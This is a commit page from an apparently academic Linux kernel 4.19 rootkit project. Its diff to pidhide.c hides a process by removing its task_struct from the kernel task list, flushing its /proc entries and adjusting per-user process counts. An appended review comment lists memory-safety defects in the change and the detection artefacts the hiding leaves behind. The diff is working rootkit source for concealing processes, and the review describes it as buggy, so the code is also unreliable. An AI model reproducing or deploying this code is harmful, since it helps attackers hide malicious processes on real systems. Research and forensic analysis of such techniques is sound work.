linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 74417cd6e0d98bf8af41649d1e29dbe054d211f8
parent e3cfe58e8d904b3806342cc0799a85cfb64a47f2
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 02:52:54 +0100

release_task attempt

Diffstat:
Mrootkit/src/pidhide.c | 22++++++++++------------
1 file changed, 10 insertions(+), 12 deletions(-)

diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -67,21 +67,19 @@ hide_pid(pid_t pid)
 add_pid_to_list(hidden_pids_tail, pid);
 struct task_struct *ts = pid_task(find_vpid(pid), PIDTYPE_PID);
- struct task_struct *ts2;
+
+ if (!ts)
+ return;
 rcu_read_lock();
- for_each_process(ts2) {
- task_lock(ts2);
- if(ts == ts2) {
- task_unlock(ts2);
- continue;
- }
- }
- list_del(&ts->tasks);
- for_each_process(ts2) {
- task_unlock(ts2);
- }
+ atomic_dec(&__task_cred(ts)->user->processes);
 rcu_read_unlock();
+ proc_flush_task(ts);
+
+ write_lock_irq(&tasklist_lock);
+ list_del(&ts->tasks);
+ write_unlock_irq(&tasklist_lock);
+ call_rcu(&ts->rcu, delayed_put_task_struct);
 }
 void
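Review bot: The closing `call_rcu(&ts->rcu, delayed_put_task_struct);` drops a task_struct reference for a task that has not exited, and `list_del(&ts->tasks)` poisons list pointers that the kernel will likely touch again when the process really exits, so this sequence is a kernel memory-safety defect rather than a clean unlink. The `atomic_dec(&__task_cred(ts)->user->processes);` has no matching increment, `pid_task(find_vpid(pid), PIDTYPE_PID)` runs before `rcu_read_lock()`, and `add_pid_to_list()` still records the PID when the new `if (!ts)` check returns early. For an analyst these are the observable artefacts: a task present in the PID hash and on a run queue but missing from the `tasks` list, a skewed per-user process count, and oopses around task exit. None of this is documented in the code, so I would add a comment above the block, e.g. `/* ts is still live: it stays in the pid hash and run queues after leaving ->tasks */`. hide_pid() begins above the hunk, so the earlier part of the function is not reviewed here.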